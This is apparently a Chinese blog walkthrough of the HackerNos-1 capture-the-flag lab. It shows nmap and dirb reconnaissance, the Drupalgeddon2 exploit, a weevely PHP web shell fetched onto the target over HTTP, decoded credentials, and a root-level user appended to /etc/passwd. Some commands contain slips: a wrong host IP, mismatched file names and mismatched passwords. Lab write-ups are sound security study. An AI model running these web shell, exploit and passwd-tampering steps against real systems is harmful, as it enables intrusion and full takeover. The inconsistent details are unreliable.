HackerNos-1靶场

HackerNos-1

靶机ip:192.168.9.41
攻击机ip(kali):192.168.9.31

1.信息收集:

nmap -sn 192.168.9.0/24
nmap -A -v 192.168.9.41 

在这里插入图片描述
在这里插入图片描述

2.扫描目录:

dirb http://192.168.9.41/drupal

在这里插入图片描述

3.在github中找到关于drupal的cms漏洞溢出

找到的连接为: https://github.com/dreadlocked/Drupalgeddon2

在kali中下载克隆这个漏洞环境:

git clone https://github.com/dreadlocked/Drupalgeddon2

然后下载一个库:

gem install highline

在这里插入图片描述

4.获取一个低权限的shell

cd /dreadlocked
./dreadlocked2.rb http://192.168.9.41/drupa

在低权限的shell中返回上一级不能成功执行,证明没得到最高权限
**5.权限维持**
先写一个木马文件在kali里面

```bash
weevely generate zxc ./zxc.php

在这里插入图片描述

然后创建一个python服务:

python2 -m SimpleHTTPServer 8080

在这里插入图片描述

然后在低权限的那个shell中下载这个木马

wget http://192.168.9.41:8080/zxc.php

在浏览器中测试这个木马是否上传成功,空白页证明上传成功了
再用本机终端连接测试:

weevely  http://192.168.9.41/drupal/z1.php 123456

在这里插入图片描述

6.提权:
查看一个文件

cat alexander.txt

在这里插入图片描述

然后是base64加密,因为他有两个等于号
解密出来是brainfuck值,然后再解密

https://www.dcode.fr/brainfuck-language  //brainfuck的解码工具

在这里插入图片描述

获取用户名和密码
james :Hacker@4514
下载passwd文件

file_download passwd /root/桌面/passwd

创建一个新的密码文件

openssl passwd -1 -salt salt 123456

在这里插入图片描述

写入密码和用户名:

echo 'chao:$1$salt$638tR8bROOvPnPklDQ9Vf.:0:0::/root/:/bin/bash'>>passwd

在这里插入图片描述

如果echo不行可以直接复制

在msf5中进行
(查找模块省略,看截图)
在这里插入图片描述

所有参数配置好之后然后run 然后shell
然后python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

进入之后再shell

然后成功弹出shell
在这里插入图片描述

切换用户

su chao
passwd:zxczxc

在这里插入图片描述

进入之后id
证明提权成功获取最高管理员权限

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值